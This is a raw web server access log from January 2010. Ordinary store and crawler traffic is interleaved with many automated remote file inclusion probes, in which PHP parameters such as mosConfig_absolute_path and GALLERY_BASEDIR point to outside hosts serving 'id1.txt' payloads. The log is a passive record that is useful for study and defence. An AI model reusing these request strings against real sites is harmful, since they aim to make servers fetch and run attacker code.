78.110.50.121 - - [05/Jan/2010:01:30:25 -0500] "GET /logs/access_log.Q109112900//?path%5Bdocroot%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:01:30:27 -0500] "GET /logs/access_log.Q109110300/xGB.php?act=admin&do=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:01:30:27 -0500] "GET /xGB.php?act=admin&do=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:01:30:27 -0500] "GET /logs/xGB.php?act=admin&do=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:01:30:27 -0500] "GET /logs/access_log.Q109112900//?path%5Bdocroot%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:01:30:28 -0500] "GET /logs/access_log.Q109110300%20%20/xGB.php?act=admin&do=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:01:30:28 -0500] "GET /xGB.php?act=admin&do=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:01:30:28 -0500] "GET /logs/xGB.php?act=admin&do=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:01:30:33 -0500] "GET /xGB.php?act=admin&do=http://via.wen.ru/id1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:01:30:33 -0500] "GET /logs/xGB.php?act=admin&do=http://via.wen.ru/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:01:30:33 -0500] "GET /logs/access_log.Q109110300/xGB.php?act=admin&do=http://via.wen.ru/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:31:03 -0500] "GET /logs/access_log.Q109051600%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:31:03 -0500] "GET /logs/access_log.Q109081400%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:31:10 -0500] "GET /logs/access_log.Q109051600%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:31:11 -0500] "GET /logs/access_log.Q109081400%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.193.180.218 - - [05/Jan/2010:01:31:12 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB6 (.NET CLR 3.5.30729)"
72.193.180.218 - - [05/Jan/2010:01:31:12 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB6 (.NET CLR 3.5.30729)"
72.193.180.218 - - [05/Jan/2010:01:31:13 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB6 (.NET CLR 3.5.30729)"
72.193.180.218 - - [05/Jan/2010:01:31:13 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB6 (.NET CLR 3.5.30729)"
99.141.48.131 - - [05/Jan/2010:01:31:25 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0115905360432400E37F009+M37+ENG HTTP/1.1" 200 77714 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0115905C6FF34400DF9F009+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
99.141.48.131 - - [05/Jan/2010:01:31:34 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1195F95C56136300081F06L+M37+ENG HTTP/1.1" 200 38039 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0115905360432400E37F009+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
99.141.48.131 - - [05/Jan/2010:01:31:40 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1195F95355539300150F06L+M37+ENG HTTP/1.1" 200 38039 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1195F95C56136300081F06L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
99.141.48.131 - - [05/Jan/2010:01:31:49 -0500] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN HTTP/1.1" 200 37791 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
99.141.48.131 - - [05/Jan/2010:01:31:50 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
99.141.48.131 - - [05/Jan/2010:01:32:06 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
99.141.48.131 - - [05/Jan/2010:01:32:07 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0115F9526CE31400265F00J+M37+ENG HTTP/1.1" 200 36277 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
99.141.48.131 - - [05/Jan/2010:01:32:17 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0115F9566F8354003BAF00J+M37+ENG HTTP/1.1" 200 36695 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0115F9526CE31400265F00J+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
170.210.192.78 - - [05/Jan/2010:01:32:20 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
170.210.192.78 - - [05/Jan/2010:01:32:20 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
170.210.192.78 - - [05/Jan/2010:01:32:20 -0500] "GET /logs/access_log.Q109072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
220.181.7.57 - - [05/Jan/2010:01:32:22 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
115.68.3.94 - - [05/Jan/2010:01:32:25 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:32:25 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:32:30 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:32:31 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
170.210.192.78 - - [05/Jan/2010:01:32:32 -0500] "GET /logs/access_log.Q109080100%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
99.141.48.131 - - [05/Jan/2010:01:32:39 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0115F95C6623C40031EF00J+M37+ENG HTTP/1.1" 200 35486 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0115F9566F8354003BAF00J+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
67.195.114.54 - - [05/Jan/2010:01:32:44 -0500] "GET /logs/error_log.Q109092800 HTTP/1.0" 200 3237058 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
99.141.48.131 - - [05/Jan/2010:01:32:46 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0115F9566F8354003BAF00J+M37+ENG HTTP/1.1" 200 36695 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0115F9526CE31400265F00J+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
208.113.237.37 - - [05/Jan/2010:01:32:52 -0500] "GET ///registration_detailed.inc.php?mosConfig_absolute_path=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
208.113.237.37 - - [05/Jan/2010:01:32:52 -0500] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.113.237.37 - - [05/Jan/2010:01:32:52 -0500] "GET /logs/access_log.Q109052900///registration_detailed.inc.php?mosConfig_absolute_path=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
208.113.237.37 - - [05/Jan/2010:01:32:58 -0500] "GET /logs/access_log.Q109091700///registration_detailed.inc.php?mosConfig_absolute_path=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:33:12 -0500] "GET //admin.admin.html.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:33:12 -0500] "GET /logs//admin.admin.html.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:33:12 -0500] "GET /logs/access_log.Q109102800%20%20//admin.admin.html.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.195.114.54 - - [05/Jan/2010:01:32:46 -0500] "GET /logs/error_log.Q109092800 HTTP/1.0" 200 3237058 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.113.237.37 - - [05/Jan/2010:01:33:47 -0500] "GET ///registration_detailed.inc.php?mosConfig_absolute_path=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
208.113.237.37 - - [05/Jan/2010:01:33:48 -0500] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.113.237.37 - - [05/Jan/2010:01:33:48 -0500] "GET /logs/access_log.Q109052900///registration_detailed.inc.php?mosConfig_absolute_path=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
208.113.237.37 - - [05/Jan/2010:01:33:52 -0500] "GET /logs/access_log.Q109091700///registration_detailed.inc.php?mosConfig_absolute_path=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:34:13 -0500] "GET /logs/access_log.Q109083000%20%20//admin.admin.html.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:34:37 -0500] "GET /logs/access_log.Q109102800%20%20//admin.admin.html.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:34:37 -0500] "GET /logs//admin.admin.html.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:34:37 -0500] "GET //admin.admin.html.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:01:34:50 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.113.237.37 - - [05/Jan/2010:01:34:59 -0500] "GET /logs/access_log.Q109052900%20%20///registration_detailed.inc.php?mosConfig_absolute_path=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
208.113.237.37 - - [05/Jan/2010:01:35:04 -0500] "GET /logs/access_log.Q109091700%20%20///registration_detailed.inc.php?mosConfig_absolute_path=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:35:19 -0500] "GET /logs/access_log.Q109083000%20%20//admin.admin.html.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:35:30 -0500] "GET /logs/access_log.Q109102200%20%20/modules/My_eGallery/index.php?basepath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:35:30 -0500] "GET /modules/My_eGallery/index.php?basepath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:35:30 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:35:32 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:35:32 -0500] "GET /modules/My_eGallery/index.php?basepath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:35:32 -0500] "GET /logs/access_log.Q109102200%20%20/modules/My_eGallery/index.php?basepath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:35:38 -0500] "GET /logs/access_log.Q109111200%20%20/modules/My_eGallery/index.php?basepath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:35:39 -0500] "GET /logs/access_log.Q109111200%20%20/modules/My_eGallery/index.php?basepath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:01:36:36 -0500] "GET /logs/access_log.Q109082800 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
125.160.17.200 - - [05/Jan/2010:01:37:57 -0500] "GET /logs/access_log.Q109100300%20%20//zboard//skin/jaemanstyle_s01_blue/write.php?dir=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
193.93.98.146 - - [05/Jan/2010:01:38:00 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
193.93.98.146 - - [05/Jan/2010:01:38:00 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
193.93.98.146 - - [05/Jan/2010:01:38:17 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
193.93.98.146 - - [05/Jan/2010:01:38:17 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
188.93.208.12 - - [05/Jan/2010:01:39:35 -0500] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:39:35 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:39:35 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:39:40 -0500] "GET /logs/access_log.Q109103100/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
194.105.128.135 - - [05/Jan/2010:01:39:48 -0500] "GET /logs//bbshop/shop/index.php?_shop_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
194.105.128.135 - - [05/Jan/2010:01:39:48 -0500] "GET /logs/access_log.Q109051100//bbshop/shop/index.php?_shop_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
194.105.128.135 - - [05/Jan/2010:01:39:48 -0500] "GET //bbshop/shop/index.php?_shop_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
209.59.12.99 - - [05/Jan/2010:01:39:56 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.160.17.200 - - [05/Jan/2010:01:39:56 -0500] "GET //zboard//skin/jaemanstyle_s01_blue/write.php?dir=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:01:39:56 -0500] "GET /logs/error_log.Q109120600%20%20//zboard//skin/jaemanstyle_s01_blue/write.php?dir=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:01:39:56 -0500] "GET /logs/access_log.Q109100300%20%20//zboard//skin/jaemanstyle_s01_blue/write.php?dir=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:01:39:56 -0500] "GET /logs//zboard//skin/jaemanstyle_s01_blue/write.php?dir=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:01:40:07 -0500] "GET //zboard//skin/jaemanstyle_s01_blue/write.php?dir=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:01:40:07 -0500] "GET /logs/access_log.Q109100300%20%20//zboard//skin/jaemanstyle_s01_blue/write.php?dir=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:01:40:07 -0500] "GET /logs//zboard//skin/jaemanstyle_s01_blue/write.php?dir=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:01:40:07 -0500] "GET /logs/error_log.Q109120600%20%20//zboard//skin/jaemanstyle_s01_blue/write.php?dir=http://www.idei.by/web.idei.by/templates/1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
194.105.128.135 - - [05/Jan/2010:01:40:10 -0500] "GET /logs/access_log.Q109110900//bbshop/shop/index.php?_shop_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
202.131.226.52 - - [05/Jan/2010:01:40:55 -0500] "GET ////setup.php?setup[use_category]=1&dir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
202.131.226.52 - - [05/Jan/2010:01:40:55 -0500] "GET /logs////setup.php?setup[use_category]=1&dir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:41:15 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:41:15 -0500] "GET /logs/access_log.Q109112100%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:41:15 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:41:22 -0500] "GET /logs/access_log.Q109112100//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:41:24 -0500] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:41:24 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:41:24 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:41:25 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:41:25 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:41:26 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:41:26 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:41:26 -0500] "GET /logs/access_log.Q109112100//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:41:28 -0500] "GET /logs/access_log.Q109103100/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:41:36 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:41:36 -0500] "GET /logs/access_log.Q109062200%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:41:36 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:01:41:41 -0500] "GET /logs/access_log.Q109103100%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
202.131.226.52 - - [05/Jan/2010:01:41:46 -0500] "GET /logs/access_log.Q109112600////setup.php?setup[use_category]=1&dir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:42:36 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:42:36 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:42:36 -0500] "GET /logs/access_log.Q109112100%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
202.131.226.52 - - [05/Jan/2010:01:42:48 -0500] "GET ////setup.php?setup[use_category]=1&dir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
202.131.226.52 - - [05/Jan/2010:01:42:48 -0500] "GET /logs////setup.php?setup[use_category]=1&dir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
202.131.226.52 - - [05/Jan/2010:01:43:22 -0500] "GET /logs/access_log.Q109112600%20%20////setup.php?setup[use_category]=1&dir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:01:43:30 -0500] "GET /logs/access_log.Q109102700%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
